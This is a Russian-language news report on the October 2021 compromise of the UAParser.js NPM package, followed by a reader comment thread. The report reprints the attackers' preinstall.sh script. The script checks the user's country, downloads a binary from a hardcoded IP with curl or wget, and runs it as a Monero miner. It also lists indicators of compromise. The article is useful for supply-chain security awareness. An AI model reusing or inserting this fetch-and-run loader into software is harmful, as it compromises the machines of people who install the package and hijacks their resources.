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В NPM-пакет UAParser.js, насчитывающий 8 млн загрузок в неделю, внедрено вредоносное ПО

23.10.2021 22:38

История с удалением из репозитория NPM трёх вредоносных пакетов, копировавших код библиотеки UAParser.js, получила неожиданное продолжение - неизвестные злоумышленники захватили контроль над учётной записью автора проекта UAParser.js и выпустили обновления, содержащие код для кражи паролей и майнинга криптовалют.

Проблема в том, что библиотека UAParser.js, которая предлагает функции для разбора HTTP-заголовка User-Agent, насчитывает около 8 млн загрузок в неделю и используется в качестве зависимости в более чем 1200 проектах. Заявлено, что UAParser.js применяется в проектах таких компаний, как Microsoft, Amazon, Facebook, Slack, Discord, Mozilla, Apple, ProtonMail, Autodesk, Reddit, Vimeo, Uber, Dell, IBM, Siemens, Oracle, HP и Verison.

Атака была совершена через взлом учётной записи разработчика проекта, который понял что-то не так после необычной волны спама, свалившейся в его почтовый ящик. Как именно была взломана учётная запись разработчика не сообщается. Атакующие сформировали выпуски 0.7.29, 0.8.0 и 1.0.0, внедрив в них вредоносный код. В течение нескольких часов разработчики вернули контроль над проектом и сформировали обновления 0.7.30, 0.8.1 и 1.0.1 c устранением проблемы. Вредоносные версии были опубликованы только в виде пакетов в NPM-репозитории. Git-репозиторий проекта на GitHub не пострадал. Всем пользователям, установившим проблемные версии, при обнаружении в Linux файла jsextension, а в Windows файлов jsextension.exe и create.dll, рекомендуется считать систему скомпрометированной и поменять на ней пароли, ключи и сертификаты безопасности.

Добавленные вредоносные изменения напоминали изменения, ранее предложенные в клонах UAParser.js, которые, судя по всему, были выпущены для тестирования функциональности перед совершением широкомасштабной атаки на основной проект. На систему пользователя с внешнего хоста загружался и запускался исполняемый файл jsextension, который выбирался в зависимости от платформы пользователя и был подготовлен в вариантах для Linux и Windows. Для платформы Windows помимо программы для майнинга криптовалюты Monero (использовался майнер XMRig) злоумышленниками также было организовано внедрение библиотеки create.dll для перехвата паролей и их отправки на внешний хост.

Код для загрузки вредоносных компонентов в файл preinstall.sh NPM-пакета был добавлен код 


   IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ')
   if [ -z "$IP" ]
    then
	var=$(pgrep jsextension)
	if [ -z "$var" ]
		then
		curl http://159.148.186.228/download/jsextension -o jsextension 
		if [ ! -f jsextension ]
			then
			wget http://159.148.186.228/download/jsextension -O jsextension
		fi
		chmod +x jsextension
		./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49***xYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null &
	fi
   fi

Как видно из кода, скрипт вначале проверял IP-адрес в сервисе freegeoip.app и не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана.

  1. Главная ссылка к новости (https://news.ycombinator.com/i...)
  2. OpenNews: В репозитории NPM выявлены три пакета, выполняющих скрытый майнинг криптовалют
  3. OpenNews: Уязвимость в NPM-пакете pac-resolver, насчитывающем 3 млн загрузок в неделю
  4. OpenNews: Уязвимость в NPM-пакете node-netmask, применяемом в 270 тысячах проектов
  5. OpenNews: В популярный NPM-модуль внедрено вредоносное ПО, копирующее параметры аутентификации
  6. OpenNews: Выявлена попытка включения бэкдора в популярный NPM-пакет mailparser
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56023-npm
Ключевые слова: npm, hack
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Обсуждение (19) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 23:27, 23/10/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Никода не было и вот опять

    ps традиция

     
     
  • 2.5, QwertyReg (ok), 23:36, 23/10/2021 [^] [^^] [^^^] [ответить]  
    		• –4 +/
    Да, давайте скакать и злорадствовать!
     
     
  • 3.9, Смузи Сопли (?), 23:53, 23/10/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Да, давайте скакать и злорадствовать!

    1. Это не в нашей традиции.

    2. Итак всё очевидно.

     
     
  • 4.10, data man (ok), 23:56, 23/10/2021 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Очевидно, что "итак" должно состоять из двух слов.
     
     
  • 5.13, Аноним (1), 00:10, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    "Итак" это имя собственное
     
     
  • 6.16, QwertyReg (ok), 00:20, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Тогда где запятая?
     
     
  • 7.19, Аноним (1), 00:26, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    С запятой нужно через пробел
     
  • 6.18, data man (ok), 00:22, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Вас сейчас совсем ничему не учат?
     
     
  • 7.21, Аноним (1), 00:29, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Не душнить

    Прочитай как "женщине, по имени Итак, всё очевидно"

     
     
  • 8.23, data man (ok), 00:37, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Какая ослоумная снежинка попалась ... текст свёрнут, показать
     
  • 4.20, QwertyReg (ok), 00:27, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Не в вашей традиции? Лол? А не вы ли бьётесь в экстазе, когда тот же GutHub ловит какой-нибудь баг?
     
  • 3.12, Аноним (12), 00:09, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Дураки должны страдать. Страдай.
     
  • 3.14, Аноним (14), 00:18, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > давайте скакать и злорадствовать!

    Мы же не в стране скакунов живём.

     

  • 1.3, пятнадцать (?), 23:29, 23/10/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +7 +/
    >не запускал вредоносное приложение для пользователей из России, Украины, Беларуси и Казахстана

    русофобия и дискриминация какая-то. не говоря уже о том, что на rust не написано.

     
     
  • 2.15, Аноним (15), 00:20, 24/10/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >не говоря уже о том, что на rust не написано

    а ты шо, исходники видел?

     

  • 1.11, Аноним (12), 00:08, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ржу на Сишном.
     
  • 1.17, QwertyReg (ok), 00:21, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Под Linux же нет вредоносов?
     
     
  • 2.22, Аноним (1), 00:34, 24/10/2021 Скрыто модератором
    		• +1 +/
     

  • 1.24, Корец (?), 02:08, 24/10/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Когда уже эту помойку закроют? Что ни новость - так про уязвимости в пакетах NPM.
     

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